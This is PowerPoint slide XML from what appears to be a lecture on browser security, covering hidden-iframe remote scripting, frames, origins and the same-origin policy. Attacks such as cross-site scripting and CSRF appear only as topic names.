              <a:ext cx="361" cy="3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7" name="Text Box 27"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3208" y="3435"/>
              <a:ext cx="313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>
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>scan</a:t>
              </a:r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146300" y="5214938"/>
            <a:ext cx="3173413" cy="593725"/>
            <a:chOff x="1411" y="3095"/>
            <a:chExt cx="1999" cy="374"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50194" name="Freeform 32"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1887" y="3095"/>
              <a:ext cx="1523" cy="212"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1544"/>
                <a:gd name="T1" fmla="*/ 4836 h 176"/>
                <a:gd name="T2" fmla="*/ 585 w 1544"/>
                <a:gd name="T3" fmla="*/ 186 h 176"/>
                <a:gd name="T4" fmla="*/ 1190 w 1544"/>
                <a:gd name="T5" fmla="*/ 6030 h 176"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 1544"/>
                <a:gd name="T10" fmla="*/ 0 h 176"/>
                <a:gd name="T11" fmla="*/ 1544 w 1544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44" h="176">
                  <a:moveTo>
                    <a:pt x="0" y="140"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="70"/>
                    <a:pt x="502" y="0"/>
                    <a:pt x="759" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1016" y="12"/>
                    <a:pt x="1280" y="94"/>
                    <a:pt x="1544" y="17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195" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1411" y="3296"/>
              <a:ext cx="12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200">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>3) port scan results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2400" y="152400"/>
            <a:ext cx="26325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Security consequence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Remote scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57347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smtClean="0"/>
              <a:t>Goal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Exchange data between a client-side app running in a browser and server-side app,  without reloading page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Java Applet/ActiveX control/Flash </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>Can make HTTP requests and interact with client-side JavaScript code,  but requires LiveConnect (not available on all browsers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>XML-RPC </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>open, standards-based technology that requires XML-RPC libraries on server and in your client-side code. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Simple HTTP via a hidden IFRAME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0"/>
              <a:t>IFRAME with a script on your web server (or database of static HTML files) is by far the easiest of the three remote scripting options  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1800" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57348" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1515662" y="6443246"/>
            <a:ext cx="61805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See:  http://developer.apple.com/internet/webcontent/iframe.html</a:t>
            </a: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1143000" y="5638800"/>
            <a:ext cx="6324600" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Important </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Point: A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page can maintain bi-directional communication with browser (until user closes/quits)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Simple remote scripting example </a:t>
            </a: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990600" y="1905000"/>
            <a:ext cx="7715250" cy="2895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&lt;script type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>"&gt;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function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>handleResponse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>() {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alert('this function is called from server.html') }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&lt;/script&gt;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id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>RSIFrame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>"     name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>RSIFrame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>"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style="width:0px; height:0px; border: 0px"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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>="blank.html"&gt;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&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>="server.html" target="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>RSIFrame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>"&gt;make RPC call&lt;/a&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800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5257800"/>
            <a:ext cx="771525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&lt;script type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>"&gt;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      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>window.parent.handleResponse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>()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&lt;/script&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr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646113" y="6400800"/>
            <a:ext cx="8269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RPC can be done silently in JavaScript, passing and receiving arguments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29702" name="TextBox 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="723900" y="4857750"/>
            <a:ext cx="77343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/>
              <a:t>server.html: another page on same server, could be server.php, etc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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676275" y="1504950"/>
            <a:ext cx="81808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dirty="0"/>
              <a:t>client.html: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“RPC” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>by passing arguments to server.html in query string </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49241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Frame and iFrame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58371" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level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smtClean="0"/>
              <a:t>Window may contain frames from different sources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Frame: rigid division as part of frameset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>iFrame: floating inline frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>iFrame example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p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Why use frames?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Delegate screen area to content from another source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Browser provides isolation based on frames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Parent may work even if frame is broken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990600" y="3352800"/>
            <a:ext cx="6858000" cy="10668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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>="hello.html" width=450 height=100&gt;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If you can see this, your browser doesn't understand IFRAME. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&gt;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Windows Interact</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29699" name="Content Placeholder 4" descr="gmail-cha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524000"/>
            <a:ext cx="8001000" cy="4833938"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297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8A1FAB6-8AD0-4CCD-882B-A9FAE9926EE2}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>35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Analogy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47107" name="Text Placeholder 6" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level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4040188" cy="639763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Operating system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47108" name="Content Placeholder 4" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2011363"/>
            <a:ext cx="4040188" cy="3951287"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Primitives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>System calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Disk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Principals: Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Discretionary access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Root exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47109" name="Text Placeholder 7" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4797425" y="1371600"/>
            <a:ext cx="4041775" cy="639763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Web browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47110" name="Content Placeholder 5" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4797425" y="2011363"/>
            <a:ext cx="4041775" cy="3951287"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Primitives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Document object model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Frames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookies / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>localStorage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Principals: “Origins”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mandatory access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cache history attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r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Policy Goals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3277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Safe to visit an evil web site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Safe to visit two pages at the same time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Address bar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>	distinguishes them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Allow safe delegation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3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53100" y="20701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0200" y="394335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 descr="ifram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03900" y="5410200"/>
            <a:ext cx="18542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Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Browser security mechanism</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795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4465637"/>
            <a:ext cx="8229600" cy="19351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Each frame of a page has an origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Origin = protocol://host:port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Frame can access its own origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>etwork access, Read/write DOM, Storage (cookies)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Frame cannot access data associated with a different origin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15" name="laptop"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1447800"/>
            <a:ext cx="3657600" cy="26670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0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47800" y="1676400"/>
            <a:ext cx="99060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7" name="Can 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4724400" y="1312713"/>
            <a:ext cx="990600" cy="1104900"/>
          </a:xfrm>
          <a:prstGeom prst="ca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8" name="Can 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4740349" y="2733488"/>
            <a:ext cx="990600" cy="1104900"/>
          </a:xfrm>
          <a:prstGeom prst="can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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>B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9800" y="2876729"/>
            <a:ext cx="7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514600" y="1676400"/>
            <a:ext cx="990600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781300" y="2057400"/>
            <a:ext cx="4953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</a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0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3352799" y="2815540"/>
            <a:ext cx="1387549" cy="47039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3238499" y="1865163"/>
            <a:ext cx="1501849" cy="3175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8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Components of browser security policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4813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Frame-Frame relationships</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>canScript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execute a script that manipulates arbitrary/nontrivial DOM elements of Frame B?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>canNavigate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(A,B)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can Frame A change the origin of content for Frame B?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Frame-principal relationships</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>readCookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(A,S), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>writeCookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(A,S)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can Frame A read/write cookies from site S?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143000" y="575656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code.google.com/p/browsersec/wiki/Part1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>      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code.google.com/p/browsersec/wiki/Part2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685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Reported Web Vulnerabilities "In the Wild"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825500" y="5943600"/>
            <a:ext cx="8089900" cy="23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1600">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data from aggregator and validator of  NVD-reported vulnerabilities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181100"/>
            <a:ext cx="823595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Library import excluded from SOP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819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200" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=https://seal.verisign.com/getseal?host_name=a.com&gt;&lt;/script&gt;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Script has privileges of imported page, NOT source server.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Can script other pages in this origin, load more scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Other forms of importing</a:t>
            </a:r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/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  <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0">
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34820" name="Picture 4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73350"/>
            <a:ext cx="375920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2750" y="3359150"/>
            <a:ext cx="10795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/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6838950" y="3522663"/>
            <a:ext cx="114617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  <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
